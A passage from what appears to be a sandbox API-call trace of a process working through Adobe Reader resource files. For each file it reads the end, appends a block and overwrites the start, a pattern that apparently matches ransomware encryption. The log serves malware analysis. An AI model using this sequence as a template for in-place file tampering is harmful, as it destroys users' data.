lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rum32.clx", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rum32.clx", lpUsedDefaultChar=0x0) returned 9 [0097.983] ReadFile (in: hFile=0x1d8, lpBuffer=0x2865a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.992] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6ff7 [0097.997] ReadFile (in: hFile=0x1d8, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.998] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6ff7 [0098.001] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.002] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0098.002] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.002] CloseHandle (hObject=0x1d8) returned 1 [0098.003] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr105.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr105.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0098.003] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0098.003] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb9e2b [0098.003] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0098.003] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.004] ReleaseMutex (hMutex=0x168) returned 1 [0098.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sgr105.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sgr105.hsp", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sgr105.hsp", lpUsedDefaultChar=0x0) returned 10 [0098.004] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0098.008] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.009] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xb8e2b [0098.009] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.011] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xb8e2b [0098.012] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.012] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0098.012] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0098.013] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.013] CloseHandle (hObject=0x1d8) returned 1 [0098.013] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv137.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv137.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0098.015] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0098.015] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x51800 [0098.015] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0098.015] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.015] ReleaseMutex (hMutex=0x168) returned 1 [0098.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slv137.lex", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slv137.lex", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="slv137.lex", lpUsedDefaultChar=0x0) returned 10 [0098.015] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0098.017] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x50800 [0098.018] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.433] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x50800 [0098.433] WriteFile (in: hFile=0x1d8, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.433] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0098.433] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0098.434] CloseHandle (hObject=0x1d8) returned 1 [0098.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0112.739] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0112.739] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x38c [0112.739] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0112.739] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0112.740] ReleaseMutex (hMutex=0x168) returned 1 [0112.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="swd.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0112.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="swd.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac54, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swd.fca", lpUsedDefaultChar=0x0) returned 7 [0112.740] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x38c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x2b1f2bc*=0x38c, lpOverlapped=0x0) returned 1 [0112.742] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0112.742] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x914, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x914, lpOverlapped=0x0) returned 1 [0112.742] CloseHandle (hObject=0x1cc) returned 1 [0112.744] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0112.746] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0112.746] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7ffc [0112.746] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0112.746] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0112.746] ReleaseMutex (hMutex=0x168) returned 1 [0112.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tur32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0112.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tur32.clx", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tur32.clx", lpUsedDefaultChar=0x0) returned 9 [0112.746] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0112.748] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6ffc [0112.748] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.333] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6ffc [0113.333] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0113.335] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0113.335] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0113.335] CloseHandle (hObject=0x1cc) returned 1 [0113.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\hkscs.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0113.340] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0113.340] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5f76c [0113.340] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0113.340] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.340] ReleaseMutex (hMutex=0x168) returned 1 [0113.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HKSCS.txt", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HKSCS.txt", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKSCS.txt", lpUsedDefaultChar=0x0) returned 9 [0113.340] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0113.344] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5e76c [0113.344] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.346] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5e76c [0113.347] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0113.348] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0113.348] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0113.348] CloseHandle (hObject=0x1cc) returned 1 [0113.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chinsimp.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0113.351] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0113.351] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x31aa5 [0113.352] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0113.352] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.352] ReleaseMutex (hMutex=0x168) returned 1 [0113.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHINSIMP.TXT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHINSIMP.TXT", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHINSIMP.TXT", lpUsedDefaultChar=0x0) returned 12 [0113.352] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0114.194] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x30aa5 [0114.194] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.241] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x30aa5 [0114.242] WriteFile (in: hFile=0x1cc, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.243] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0114.243] WriteFile (in: hFile=0x1cc, lpBuffer=0x28ae9a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ae9a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.243] CloseHandle (hObject=0x1cc) returned 1 [0114.245] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\iceland.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0114.309] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.309] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x377c [0114.309] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.310] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.310] ReleaseMutex (hMutex=0x168) returned 1 [0114.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ICELAND.TXT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ICELAND.TXT", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ICELAND.TXT", lpUsedDefaultChar=0x0) returned 11 [0114.310] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.401] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x277c [0114.401] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.415] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x277c [0114.416] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.416] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0114.416] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea99e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.416] CloseHandle (hObject=0x1cc) returned 1 [0114.417] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 